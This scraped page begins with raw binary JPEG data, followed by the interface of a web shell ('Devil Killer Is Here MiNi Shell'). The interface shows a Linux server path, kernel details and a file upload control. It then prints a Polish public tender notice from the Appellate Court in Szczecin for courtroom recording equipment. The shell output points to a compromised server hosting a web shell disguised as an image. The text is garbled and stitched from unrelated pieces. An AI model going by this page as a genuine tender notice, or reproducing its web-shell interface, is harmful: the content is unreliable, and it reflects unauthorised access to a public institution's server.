JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211102/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211102/0025417801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i wdrożenie systemu cyfrowej rejestracji przebiegu rozpraw sądowych w Sądzie Rejonowym w Stargardzie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">S ĄD APELACYJNY W SZCZECINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 812734021</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 163</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-165</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mateusz.kiernozycki@szczecin.sa.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szczecin.sa.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i wdrożenie systemu cyfrowej rejestracji przebiegu rozpraw sądowych w Sądzie Rejonowym w Stargardzie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-44a27082-3bd2-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00254178</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013395/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa i wdrożenie systemu cyfrowej rejestracji przebiegu rozpraw sądowych w Sądzie Rejonowym w Stargardzie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji. System jest dostępny pod<br/>adresem: https://ezamowienia.ms.gov.pl<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania<br/>konta w Systemie, ani logowania do Systemu.<br/>3. Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne<br/>jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy<br/>kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do<br/>autentykacji i podpisu.<br/>4. Korzystanie z Systemu możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają<br/>użytkownicy Wykonawcy następujących minimalnych wymagań technicznych i specyfiki połączenia:<br/>- posiadanie komputera o parametrach umożliwiających zainstalowanie następującego<br/>oprogramowania:<br/>● w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>a) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500<br/>MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - Lub ich<br/>nowsze wersje<br/>b) przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze<br/>lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>c) Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox,Opera. Zalecane jest<br/>używanie najnowszych wersji przeglądarek<br/>● w zakresie składania podpisu kwalifikowanego:<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web<br/>c) oprogramowania SzafirHost w systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w punktach a, b i c powyżej znajduje się w<br/>Systemie w zakładce E-learning.5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i<br/>informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług<br/>Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.<br/>6. Użytkownikom Zewnętrznym Wykonawcy przysługuje prawo korzystania z asysty obejmującej<br/>wsparcie techniczne w kwestiach dotyczących korzystania z Systemu, polegające na doradztwie<br/>telefonicznym i e-mailowym na zasadach określonych w Regulaminie korzystania z usług Systemu<br/>7. W sytuacji awarii Systemu lub niedostępności Systemu, uniemożliwiających komunikację<br/>Wykonawcy i Zamawiającego poprzez System, Zamawiający dopuszcza komunikację za pomocą<br/>poczty elektronicznej na adres: mateusz.kiernożycki@szczecin.sa.gov.pl (nie dotyczy składania ofert).<br/>8. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB.<br/>Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do<br/>archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>9. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB zostały określone w<br/>ROZPORZĄDZENIU RADY MINISTRÓW z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych Dz. U. z 2012 r., poz.<br/>526, ze zm</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 i art. 14 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz.U.UE.L.2016.119.1), dalej „RODO”, informuję, że:<br/>1. Administratorem Państwa danych osobowych jest Dyrektor Sądu Apelacyjnego w Szczecinie z<br/>siedzibą przy ul. Mickiewicza 163, 71-165 Szczecin.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym kontakt możliwy jest za<br/>pośrednictwem adresu do korespondencji: Sąd Apelacyjny w Szczecinie, 71-165 Szczecin, ul.<br/>Mickiewicza 163 lub za pośrednictwem poczty elektronicznej: iod@szczecin.sa.gov.pl.<br/>3. Dane osobowe przekazane przez Wykonawcę (w rozumieniu przepisów ustawy Pzp) przetwarzane<br/>będą w celu związanym z prowadzeniem postępowania o udzielenie zamówień publicznych<br/>realizowanego w trybie wynikającym z odpowiednich przepisów prawa oraz w celu zawarcia, realizacji i<br/>rozliczenia umowy z Sądem Apelacyjnym w Szczecinie.<br/>4. Przesłankami legalizującymi przetwarzanie danych osobowych przekazanych przez Wykonawcę są:<br/>a) art. 6 ust. 1 lit. b RODO – w celu zawarcia, realizacji i rozliczenia umowy;<br/>b) art. 6 ust. 1 lit. c RODO – w celu wypełnienia obowiązków prawnych ciążących na administratorze<br/>określonych w przepisach krajowych lub unijnych odnoszących się do zamówień publicznych,<br/>przedmiotu umowy oraz ochrony danych osobowych;<br/>c) art. 6 ust. 1 lit. f RODO – prawnie uzasadniony interes realizowany przez administratora, tj.:<br/> ewentualne ustalenie i dochodzenie roszczeń lub obrona przed roszczeniami;<br/> potrzeba posiadania stałego kontaktu z osobami wskazanymi przez Wykonawcę, odpowiedzialnymi za<br/>realizację umowy, przy czym z chwilą podjęcia przez tę osobę czynności w ramach wykonywania<br/>umowy, takich, które podlegają obowiązkowi udokumentowania, zmianie ulegnie przesłanka<br/>przetwarzania danych osobowych, którą do tego momentu będzie art.. 6 ust. 1 lit. c RODO (obowiązek<br/>prawny ciążący na administratorze dot. m.in. archiwizowanie dokumentów).<br/>5. Dane osobowe przekazane przez Wykonawcę będą przetwarzane jedynie przez upoważnione do<br/>tego osoby.<br/>6. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawyPzp oraz:<br/> podmioty zapewniające na rzecz Sądu Apelacyjnego w Szczecinie obsługę techniczną i<br/>organizacyjną, np. dostawcy oprogramowania do zarządzania systemami, podmioty świadczące<br/>obsługę techniczną oprogramowania, itp.;<br/> podmioty upoważnione do tego z mocy prawa.<br/>7. Dane osobowe przekazane przez Wykonawcę będą przechowywane zgodnie<br/>z obowiązującymi przepisami ustawy Pzp oraz wewnętrznymi regulacjami zgodnymi z nią dot.<br/>archiwizacji.<br/>8. Obowiązek podania przez Wykonawcę danych osobowych jest wymogiem ustawowym określonym<br/>w ustawie Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>9. W odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>10. Dane osobowe przekazane przez Wykonawcę nie będą przekazywane do państwa trzeciego lub<br/>organizacji międzynarodowej.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">11. Przysługuje Pani/Panu:<br/>- na podstawie art. 15 RODO prawo dostępu do treści swoich danych osobowych – w celu realizacji<br/>niniejszego żądania administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania;<br/>- na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia swoich danych osobowych, przy<br/>czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>- na podstawie art. 18 ust. 1 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia.<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania,<br/>że przetwarzanie udostępnionych danych osobowych narusza przepisy RODO.<br/>12. W zakresie w jakim Pani/Pana dane przetwarzane są w oparciu o art. 6 ust. 1 lit. f RODO<br/>przysługuje Pani/Panu prawo do wniesienia w dowolnym momencie sprzeciwu - z przyczyn<br/>związanych z Pani/Pana szczególną sytuacją – wobec przetwarzania dotyczących Pani/Pana danych<br/>osobowych.<br/>13. Nie przysługuje Pani/Panu:<br/>- prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- prawo sprzeciwu, wobec przetwarzania na podstawie art. 21 RODO danych osobowych , w<br/>przypadku gdy podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b lub<br/>art. 6 ust. 1 lit. c RODO.<br/>14. Podmiot będący Wykonawcą lub stroną umowy zobowiązany jest do wypełnienia obowiązków<br/>informacyjnych przewidzianych odpowiednio w art. 13 i 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma<br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPiA 2701/10/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa i wdrożenie systemu cyfrowej rejestracji przebiegu rozpraw sądowych na 7 salach rozpraw Sądu Rejonowego w Stargardzie. Sale te nie były do tej pory objęte dostawą przedmiotowego systemu. Dostawa i wdrożenie ma nastąpić dla 4 sal rozpraw w budynku Sądu Rejonowego na ul. Okrzei 8 w Stargardzie oraz dla 3 sal rozpraw w budynku Sądu Rejonowego na ul. Wojska Polskiego 17-19 w Stargardzie.<br/>2.	Zakres zamówienia obejmuje w szczególności:<br/>1)	Dostawę, instalację, konfigurację, wdrożenie oraz uruchomienie systemu cyfrowej rejestracji przebiegu rozpraw sądowych w 7 salach rozpraw Sądu Rejonowego w Stargardzie, w tym:<br/>a)	Wykonanie Projektów technicznych dla każdej z sal rozpraw dot. rozmieszczenia, połączeń i konfiguracji elementów systemu.<br/>b)	Dostawę urządzeń technicznych wyposażenia sali rozpraw zapewniających możliwość obsługi procesu rejestracji przebiegu rozpraw sądowych oraz zapewniających współpracę z posiadanym przez Zamawiającego Oprogramowaniem „ReCourt”. <br/>c)	Instalację i konfigurację urządzeń technicznych wyposażenia sali rozpraw, w tym w szczególność służące temu celowi montaż/demontaż zabudowy lub innych elementów.<br/>d)	Wdrożenie i uruchomienie Systemu cyfrowej rejestracji rozpraw sądowych, w tym oprogramowania dostarczonego przez Zamawiającego na wszystkich wskazanych salach sądowych.<br/>e)	Wykonanie dokumentacji powykonawczej.<br/>2)	Świadczenie usług serwisu i wsparcia technicznego dla Zamawiającego w lokalizacji objętej wdrożeniem systemu. <br/>3)	Udzielenie gwarancji na prawidłowe działanie systemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32330000-5 - Aparatura do nagrywania i powielania dźwięku i obrazu wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">32232000-8 - Sprzęt wideokonferencyjny</p> <p class="mb-0">32341000-5 - Mikrofony</p> <p class="mb-0">32342410-9 - Sprzęt dźwiękowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert.<br/><br/>1)	Cena - 60 %<br/><br/>	Sposób przyznania punktów w kryterium „cena”:<br/><br/>	cena najniższa<br/> ------------------------------------------------ x 100 pkt x znaczenie kryterium 60 %<br/>	cena oferty ocenianej<br/><br/>W powyższym kryterium oferta wykonawcy może otrzymać maksymalnie 60 punktów.<br/><br/><br/>2) Okres gwarancji i rękojmi – 40 %<br/><br/>Sposób przyznania punktów w kryterium „okres gwarancji i rękojmi”:<br/><br/>Wymagany minimalny okres gwarancji i rękojmi: 36 miesięcy od dnia odbioru końcowego przedmiotu umowy.<br/><br/>Za zaoferowanie okresu gwarancji i rękojmi w wysokości 36 miesięcy wykonawca otrzyma 0 pkt.<br/>Za zaoferowanie okresu gwarancji i rękojmi w wysokości 48 miesięcy Wykonawca otrzyma 40 punktów.<br/><br/>W powyższym kryterium oferta Wykonawcy może otrzymać maksymalnie 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może się ubiegać wykonawca, który spełnia następujące warunki udziału w postępowaniu:<br/>1.1.dotyczące zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia warunku w tym zakresie.<br/><br/>1.2.dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>1.3. dotyczące sytuacji ekonomicznej i finansowej:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/> <br/>1.4. dotyczące zdolności technicznej i zawodowej:<br/>Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich 3 lat (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum jedną dostawę o wartości nie mniejszej niż 300 000,00 zł brutto odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot niniejszego zamówienia. <br/>Za dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot niniejszego zamówienia, Zamawiający uzna dostawę i wdrożenie systemu cyfrowej rejestracji przebiegu rozpraw sądowych o wartości min. 300.000,00 zł brutto; <br/>W przypadku składania oferty wspólnej ww. warunek musi spełniać co najmniej jeden z Wykonawców w całości.<br/>W sytuacji, gdy Wykonawca w zakresie doświadczenia polega na zdolnościach technicznych i zawodowych podmiotów trzecich na zasadach określonych w art. 118 ustawy, minimum jeden z tych podmiotów musi wykazać spełnienie przedmiotowego warunku w całości. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składając ofertę zobowiązany jest złożyć:<br/>Wypełniony formularz ofertowy, według wzoru stanowiącego Załącznik nr 1 do SWZ;oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania <br/>o udzielenie za¬mówienia - wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy <br/>z Wykonawców (wspólnicy spółki cywilnej 